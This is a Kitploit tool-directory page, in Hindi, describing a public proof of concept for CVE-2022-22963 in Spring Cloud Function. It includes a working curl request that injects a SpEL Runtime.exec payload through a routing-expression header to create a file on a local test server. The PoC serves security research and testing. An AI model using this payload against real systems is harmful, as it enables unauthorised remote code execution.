Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-22963-PoC — CVE-2022-22963 के लिए न्यूनतम प्रूफ-ऑफ-कॉन्सेप्ट, Spring Cloud Function में SpEL इंजेक्शन के माध्यम से दूरस्थ कोड निष्पादन। curl और एक कमजोर सर्वर के साथ शोषण प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/kirill89/cve-2022-22963-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubkirill89/cve-2022-22963-poc

CVE-2022-22963-PoC

CVE-2022-22963 के लिए न्यूनतम प्रूफ-ऑफ-कॉन्सेप्ट, Spring Cloud Function में SpEL इंजेक्शन के माध्यम से दूरस्थ कोड निष्पादन। curl और एक कमजोर सर्वर के साथ शोषण प्रदर्शित करता है।

रिपॉजिटरी देखें
9314 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-22963 RCE PoC

org.springframework.cloud:spring-cloud-function-core में CVE-2022-22963 रिमोट कोड एक्ज़ीक्यूशन को दोहराने के लिए न्यूनतम उदाहरण।

एक्सप्लॉइट

सर्वर चलाएँ

root@kitploit:~
mvn spring-boot:run

एक अनुरोध भेजें

root@kitploit:~
curl -X POST -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch PWNED")' -d xxx http://127.0.0.1:8080/functionRouter

एक्सप्लॉइट के परिणामस्वरूप, PWNED फ़ाइल pom.xml के पास बन जाएगी।

अतिरिक्त जानकारी

  • मूल एडवाइज़री: https://tanzu.vmware.com/security/cve-2022-22963
  • Snyk एडवाइज़री: https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORKCLOUD-2436645
  • यह PoC इस पर आधारित है: https://github.com/Pizz33/Spring-Cloud-Function-SpEL
टूल डाउनलोड करें